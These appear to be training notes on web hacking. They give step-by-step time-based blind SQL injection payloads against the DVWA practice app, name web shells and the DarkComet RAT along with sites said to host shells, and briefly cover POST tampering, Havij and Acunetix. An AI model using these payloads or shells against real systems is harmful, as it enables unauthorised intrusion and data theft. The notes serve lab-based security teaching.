Session Time Based SQL Injection

1. Time Based SQL injection
2. =======================
3. Time Based SQL Injection is the subcategory of Blind Based SQL Injection in which when we input a Query. They are often use to extracts the data when there no other way to retrieve the data from the database while executing a query in the database which creates a time delay if the query is right depending on the time it takes to get the server response. As you can guess, this type of inference approach is particularly useful for blind injection attacks. It is basically used by using queries which results to delay of response.
4.  
5. We basically use the functions such as :
6. sleep()
7. delay()
8. hibernate()
9.  
10. Basic syntax
11. select if(expression,true,false)
12.  
13.  
14. Steps while performing time based injection in DVWA:
15.  
16. Step 1: 1 --> result
17. Step 2:1' --> no result
18. Step 3:1' - sleep(3) #
19. Step 4:1' - if(mid(version(),1,1)='5', sleep(3),0) #
20. Step 5:1' - if(mid(version(),1,1)='4', sleep(3),0) #
21. Step 6:1' - if(mid(version(),1,1)='3', sleep(3),0) #
22. Step 7:1' - if(mid(version(),1,1)='2', sleep(3),0) #
23. Step 8:1' - if(mid(version(),1,1)='1', sleep(3),0) #
24.  
25. Here mid() function is used as same as that we use substr i.e.
26. mid( string, starting point, length till where we want to extract)
27.  
28. =x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x==x=x=x=x==x=x=x==x=x=x=x==x
29.  
30. Arbitrary File Upload
31. =====================
32. When the web application askes you to input or upload some kind of document, but instead the person uploads some kind of malicious file. Like darkComet.exe, b374k.php
33.  
34.  
35. Some shells could be found on following websites:
36. webshell.co
37. privshell.com
38.  
39. usefull scripts:
40. 1.b374k.php
41. 2.Dhanush.php
42. 3.pouya.asp
43.  
44.  
45. =x=x=x=x==x=x=x=x=x=x=x=x==x=x==x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x==x
46.  
47. POST PARAMETER INJECTION
48. ==========================
49. POST Parameter Injection is the attack vector when we tamper and manipulate POST Parameters and with HTTP Headers through some tools like Tamper Data, Burp Suite etc.
50. First we have to capture the http packets Parameters moving from a browser to a Web Server.
51.  
52.  
53.  
54. =x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x
55.  
56.  
57. Havij : An automated tool based on GUI( Graphical User Interface)
58.  
59. Demo...
60.  
61.  
62.  
63. ------------------------------------------------------------------------------------------
64.  
65. Acunetix - Web Vulnerability Scanner
66. ==========
67.  
68. Now as it requires a lot of effort in doing a VAPT in a website so in order to save time there are several tools which automate various types of scans and even generate a report .
69. Acunetix is one of the software which helps in doing the same.
70.  
71. DEMO....